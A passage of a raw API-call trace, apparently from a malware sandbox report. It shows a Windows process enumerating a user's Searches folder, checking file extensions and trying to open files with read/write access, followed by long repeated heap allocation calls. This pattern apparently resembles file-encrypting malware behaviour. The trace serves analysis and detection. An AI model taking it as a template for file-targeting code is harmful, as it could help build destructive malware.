dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.589] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.589] PathFindFileNameW (pszPath="") returned="" [0191.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.589] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Searches\\*" (normalized: "c:\\users\\keecfmwgj\\searches\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0191.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.590] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0191.590] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8317a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0191.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0191.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.590] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\desktop.ini") returned=".ini" [0191.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.590] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0191.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.591] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\Everywhere.search-ms") returned=".search-ms" [0191.591] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\keecfmwgj\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.654] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0191.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.654] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0191.655] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\keecfmwgj\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0191.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.655] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0191.655] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0191.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0191.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0191.656] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0191.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0191.656] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0191.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0191.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0191.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 